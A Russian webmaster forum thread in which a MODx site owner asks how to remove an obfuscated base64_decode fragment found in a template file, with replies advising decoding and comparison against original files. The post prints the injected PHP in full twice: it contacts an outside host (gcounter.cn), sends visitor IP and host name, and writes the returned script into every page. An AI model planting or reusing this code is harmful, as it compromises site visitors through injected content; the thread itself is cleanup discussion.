- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Подскажите как убрать base64_decode из php файла шаблона?
Сайт на CMS MODx CMF Team.
В файле jquery00.php относящемся к шаблону обнаружил вот такой фрагмент:
function yyelq_egmo($uphf){return ykgtq_clo($uphf) .";document.write('".pboa_htyw."');".'document.cookie = "qixy=1;expires=Sun, 01-Dec-2015 08:00:00 GMT;path=/"';}$pboa_htyw=puxk_oyxdc(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw") . "?i=" . $_SERVER["REMOTE_ADDR"] . "&s=" . $_SERVER["HTTP_HOST"]);@preg_match("#<open>(.*)</close>#", $pboa_htyw, $matches);$pboa_htyw= isset($matches[1]) ? $matches[1] : "";if ($pboa_htyw) {define("pboa_htyw",$pboa_htyw); ob_start("yyelq_egmo");}}?>
;(function(){
"aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw" раскодировал и получил "http://gcounter.cn/info.php" - сайт на который ESET не пускает как на вирусный. Пока закодировал "http://www.yandex.ru/"] и поставил вместо.
На работу сайта это не повлияло.
Подскажите как вообще безболезненно убрать этот кусок с base64_decode из файла?
Да вроде просто!
Сделайте
echo base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw");и посмотрите что там внутри.
Удалил этот кусок:
}
function yyelq_egmo($uphf){return ykgtq_clo($uphf) .";document.write('".pboa_htyw."');".'document.cookie = "qixy=1;expires=Sun, 01-Dec-2015 08:00:00 GMT;path=/"';}$pboa_htyw=puxk_oyxdc(base64_decode("aHR0cDovL3d3dy55YW5kZXgucnUv") . "?i=" . $_SERVER["REMOTE_ADDR"] . "&s=" . $_SERVER["HTTP_HOST"]);@preg_match("#<open>(.*)</close>#", $pboa_htyw, $matches);$pboa_htyw= isset($matches[1]) ? $matches[1] : "";if ($pboa_htyw) {define("pboa_htyw",$pboa_htyw); ob_start("yyelq_egmo");}}?>
;(function(){
Сайт вроде работает нормально.
А что это может быть? Что в нём прописано?
потёрто
10 букв
Хм, насколько помню шаблоны modx хранит в базе. Но с начала года несколько раз уже встречался с заражениями сайта каким-то вирусом, который вставлял скрытый фрейм, причем 1 раз для пользователя. У вас тут я смотрю как раз код ставит куку, так что я бы сравнил файлы на сервере с эталонными из инсталляционного архива.